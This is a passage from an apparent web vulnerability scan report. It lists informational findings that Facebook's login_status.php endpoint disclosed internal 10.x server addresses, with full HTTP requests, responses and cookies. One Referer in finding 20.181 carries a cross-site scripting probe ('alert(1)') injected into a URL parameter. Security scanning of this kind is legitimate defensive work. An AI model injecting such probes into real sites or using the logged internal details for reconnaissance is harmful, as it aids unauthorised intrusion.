Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2616e5be4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff377786e5&relation=parent&transport=postmessage&frame=f3891ed05
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.139.119
X-Cnection: close
Date: Thu, 05 May 2011 02:16:27 GMT
Content-Length: 0


20.173. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.54.113

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a1dab04c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f4119c24%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b4f69f4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb7eabbf8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b4f69f4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df221abf4a4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b4f69f4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b5a5f14c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b4f69f4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f221abf4a4&origin=http%3A%2F%2Faol.sportingnews.com%2Ffed13492&relation=parent&transport=postmessage&frame=f5b4f69f4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.54.113
X-Cnection: close
Date: Thu, 05 May 2011 02:06:56 GMT
Content-Length: 0


20.174. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.115.59

Request

GET /extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.59
X-Cnection: close
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

20.175. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.142.109

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31377da28%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20cd4127c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcd9787c8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cadfc1a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcd9787c8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6834b99c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcd9787c8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1002da43c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcd9787c8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f6834b99c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3f0f70294&relation=parent&transport=postmessage&frame=fcd9787c8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.142.109
X-Cnection: close
Date: Thu, 05 May 2011 02:01:15 GMT
Content-Length: 0


20.176. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.37.57

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df26285d1fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd4e87644%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df156385028%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df19b162584%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df156385028&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9c43e95c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df156385028&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffe24891%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df156385028&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f9c43e95c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff316d67154&relation=parent&transport=postmessage&frame=f156385028
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.37.57
X-Cnection: close
Date: Thu, 05 May 2011 01:04:06 GMT
Content-Length: 0


20.177. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.181.37

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35337699%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25acfbae4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df297fe543c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3871b77e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df297fe543c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15f666d24%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df297fe543c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25d754e34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df297fe543c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f15f666d24&origin=http%3A%2F%2Faol.sportingnews.com%2Ff28daf444c&relation=parent&transport=postmessage&frame=f297fe543c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.37
X-Cnection: close
Date: Thu, 05 May 2011 02:15:15 GMT
Content-Length: 0


20.178. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.121.37

Request

GET /extern/login_status.php?api_key=187288694643718&app_id=187288694643718&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df113654da4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2febd6d8c%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e3782514%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a4b36fdc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e3782514&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1bdbf70b%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e3782514&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17f6f780%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e3782514&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1bdbf70b&origin=http%3A%2F%2Ftechcrunch.com%2Ff345970418&relation=parent&transport=postmessage&frame=f3e3782514
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.121.37
X-Cnection: close
Date: Thu, 05 May 2011 01:19:10 GMT
Content-Length: 0


20.179. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.66.45

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d5a38f9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25b1fc23c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39e2d23fc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1315a89b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39e2d23fc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc78c882%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39e2d23fc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df144ad2948%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39e2d23fc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fc78c882&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1019ba1c&relation=parent&transport=postmessage&frame=f39e2d23fc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.66.45
X-Cnection: close
Date: Thu, 05 May 2011 01:37:47 GMT
Content-Length: 0


20.180. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.42.27

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df26f68768%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ba640c78%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff0d748a%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df384b32954%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff0d748a&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff409df34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff0d748a&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2935de05c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff0d748a&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=ff409df34&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2a4b4f67&relation=parent&transport=postmessage&frame=ff0d748a
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.42.27
X-Cnection: close
Date: Thu, 05 May 2011 01:39:00 GMT
Content-Length: 0


20.181. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.32.219.109

Request

GET /extern/login_status.php?api_key=188636667827818&app_id=188636667827818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ca1f2ec%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df309fbd89%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5a7f9c8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37698649c%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5a7f9c8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23f527ee4%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5a7f9c8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ebf36c7%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5a7f9c8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/?ba9f0%22-alert(1)-%22394da22382f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f23f527ee4&origin=http%3A%2F%2Fportalblog.aol.com%2Ff2979901a8&relation=parent&transport=postmessage&frame=f1f5a7f9c8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.219.109
X-Cnection: close
Date: Thu, 05 May 2011 10:56:21 GMT
Content-Length: 0


20.182. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.99.85

Request

